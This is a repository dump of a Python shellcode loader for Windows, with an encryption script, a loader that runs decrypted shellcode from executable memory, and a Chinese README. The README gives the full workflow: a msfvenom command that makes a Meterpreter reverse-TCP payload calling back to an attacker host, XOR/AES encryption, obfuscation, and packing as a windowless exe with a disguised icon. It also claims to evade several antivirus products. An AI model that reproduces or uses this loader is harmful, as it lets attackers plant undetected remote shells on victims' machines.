├── setting.ico
├── requirements.txt
├── jiami.py
├── main.py
└── README.md

/setting.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HZzz2/python-shellcode-loader/HEAD/setting.ico
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
pycryptodome
pyinstaller
pyinstaller[encryption]
python-minifier

--------------------------------------------------------------------------------
/jiami.py:
--------------------------------------------------------------------------------
import base64
from Crypto.Cipher import AES


def add_to_16(s: str) -> bytes:
    """Pad *s* with NUL (0x00) characters to a multiple of 16 and return it as bytes.

    This is NUL padding, not PKCS#7, so it is only unambiguous for text that
    never ends in NUL (main.py's aes_jiemi strips every trailing NUL).  The
    length is measured in characters before encoding; a non-ASCII string can
    encode to a byte length that is not a multiple of 16, and AES.encrypt would
    then raise ValueError.  The input used here (base64 text XORed with a
    single small key) stays within ASCII, so that case is not reached.
    """
    while len(s) % 16 != 0:
        s += '\0'
    return str.encode(s)  # returns bytes (UTF-8 encoding of the padded str)


def aes_jiami(text: str) -> str:
    """Encrypt *text* with AES-128-ECB under a fixed key; return single-line base64.

    The 16-byte key is a literal that also appears verbatim in main.py, so this
    hides the payload from a casual look but gives no confidentiality against
    anyone who can read the loader.  ECB with a fixed key is deterministic:
    equal 16-byte plaintext blocks produce equal ciphertext blocks.  The
    newlines that base64.encodebytes inserts are removed so the result is one
    line that can be pasted into main.py.
    """
    # Key length must be 16, 24 or 32 bytes (AES-128, AES-192, AES-256); this one is 16.
    key = 'LeslieCheungKwok'
    aes = AES.new(add_to_16(key), AES.MODE_ECB)
    encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
    return encrypted_text


def xor_jiami(s: str, key: int) -> str:
    """XOR every character of *s* with the integer *key* and return the result as str.

    Single-key XOR is its own inverse; main.py's xor_jiemi is the identical
    function and undoes it.  This is a reversible encoding, not encryption.
    """
    xor_s = ''
    for i in s:
        xor_s += chr(ord(i) ^ key)
    return xor_s


if __name__=='__main__':
    # 'payload' is a placeholder: the README says to replace it with the base64
    # of the raw shellcode.  The XOR-then-AES result is written to ./aes-xor.txt
    # so it can be pasted into main.py's jiami_sc.
    sc = 'payload'
    with open('./aes-xor.txt','w') as f:
        f.write(aes_jiami(xor_jiami(sc,35)))

--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
import base64
import ctypes

from Crypto.Cipher import AES

# Windows only: ctypes.windll does not exist on other platforms, so importing
# this module elsewhere fails here.
kernel32 = ctypes.windll.kernel32


def aes_jiemi(s: str) -> str:
    """Reverse jiami.aes_jiami: base64-decode *s*, AES-128-ECB decrypt, strip NUL padding.

    The key literal must match the one in jiami.py.  AES raises ValueError if
    the decoded ciphertext length is not a multiple of 16, and decodebytes
    raises binascii.Error on malformed base64.  rstrip(b'\\0') removes the
    padding added by jiami.add_to_16, but would also remove any genuine
    trailing NUL bytes of the plaintext.
    """
    cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
    return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\0').decode("utf8")


def xor_jiemi(s: str, key: int) -> str:
    """Undo jiami.xor_jiami: XOR each character of *s* with *key* (same operation, since XOR is self-inverse)."""
    xor_s = ''
    for i in s:
        xor_s += chr(ord(i) ^ key)
    return xor_s


def write_memory(buf):
    """Copy the ctypes buffer *buf* into a fresh executable allocation and return its address.

    VirtualAlloc(NULL, len(buf), 0x3000, 0x40) requests MEM_COMMIT|MEM_RESERVE
    memory with PAGE_EXECUTE_READWRITE protection, i.e. a region that is
    writable and executable at the same time.  Only restype is declared for
    VirtualAlloc, so ctypes applies its default conversion (C int) to *length*.
    The return value is not checked: on failure VirtualAlloc returns NULL
    (None through c_void_p) and the RtlMoveMemory call below would then write
    through a null pointer.  Returns the address as int (or None on failure).
    """
    length = len(buf)

    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)

    kernel32.RtlMoveMemory.argtypes = (
        ctypes.c_void_p,
        ctypes.c_void_p,
        ctypes.c_size_t)
    kernel32.RtlMoveMemory(ptr, buf, length)
    return ptr


def run(shellcode: bytes):
    """Execute *shellcode* (raw machine code bytes) in this process by calling it as a C function.

    create_string_buffer appends a NUL terminator, so the buffer copied by
    write_memory is len(shellcode) + 1 bytes.  The cast to CFUNCTYPE(None) and
    the call transfer control to that memory on the current thread; control
    returns only if the code itself returns.  Nothing here validates the
    bytes, so a wrong paste in __main__ simply crashes the process.
    """
    buf = ctypes.create_string_buffer(shellcode)
    ptr = write_memory(buf)
    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
    shell_func()


if __name__ == '__main__':
    # 'payload' is a placeholder for the contents of aes-xor.txt written by
    # jiami.py.  The steps are jiami.py in reverse: AES decrypt, XOR with the
    # same key (35), then base64-decode back to the raw bytes, which are run.
    jiami_sc = 'payload'
    sc = xor_jiemi(aes_jiemi(jiami_sc),35)
    shde = base64.b64decode(sc)
    run(shde)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# python-shellcode-loader


## 简单介绍
免杀方式 msfvenom生成raw格式的shellcode-->base64-->XOR-->AES
将python代码缩小并混淆最后生成exe
目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等


## 获取项目
git clone https://github.com/HZzz2/python-shellcode-loader.git

cd python-shellcode-loader

pip install -r .\requirements.txt

## 生成shellcode
#生成shellcode
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw` 16 | 17 | ## base64编码shellcode并替换jiami.py中的值 18 | #base64
`base64 -w 0 -i rev.raw > rev.bs64`
`cat rev.bs64`
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'


## 加密base64并替换main.py中的值
#加密base64后的shellcode
`python3 jiami.py`
#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)
复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'


## 缩小和混淆py代码

### 缩小python代码
`pyminify main.py --output main-mini.py`

### 混淆main-mini.py中的python代码
[https://pyob.oxyry.com/](https://pyob.oxyry.com/) 在线混淆
![image.png](https://cdn.nlark.com/yuque/0/2022/png/26697321/1654524591386-7385c972-05e4-4761-bac3-311ae4ab2b0c.png#clientId=ufd1019e1-55bc-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=531&id=u32a8913b&margin=%5Bobject%20Object%5D&name=image.png&originHeight=664&originWidth=1919&originalType=binary&ratio=1&rotation=0&showTitle=false&size=192572&status=done&style=none&taskId=uf5d03036-4fc8-4141-aec3-77143fc268e&title=&width=1535.2)
将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py


## 打包成可执行文件exe
#打包成exe
`pyinstaller.exe -Fw -i .\setting.ico --key=leslie .\main-mini-ob.py`
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥
等待打包完成。。。。
打包好后的可执行程序在dist目录中


## 流程图
![](https://cdn.nlark.com/yuque/0/2022/jpeg/26697321/1654524239719-d5ff881a-602c-4508-81b8-8e14c0d41595.jpeg)

## 检测图


### DF
![image](https://user-images.githubusercontent.com/22775890/172209887-134b5107-353b-45e2-a3b6-9e65b5189b8c.png)


### 火绒
![image](https://user-images.githubusercontent.com/22775890/172209706-1634bd75-7fe4-4844-bf95-bb8e3dea0540.png)


### 360杀毒
![image](https://user-images.githubusercontent.com/22775890/172209912-86663b43-9afe-40ec-ba1a-dd6951f04ac3.png)


### 360安全卫士云查杀
![image](https://user-images.githubusercontent.com/22775890/172209928-b96f0201-2b4d-4efb-bf4c-33df8ed3ce03.png)


### virustotal
![image](https://user-images.githubusercontent.com/22775890/172209945-6aa0f8d1-dbe2-443d-9bf1-b127fe271aa9.png)


https://user-images.githubusercontent.com/22775890/172209225-080c2549-45cc-4135-a907-38738ab42df5.mp4



## 免责声明
仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。


--------------------------------------------------------------------------------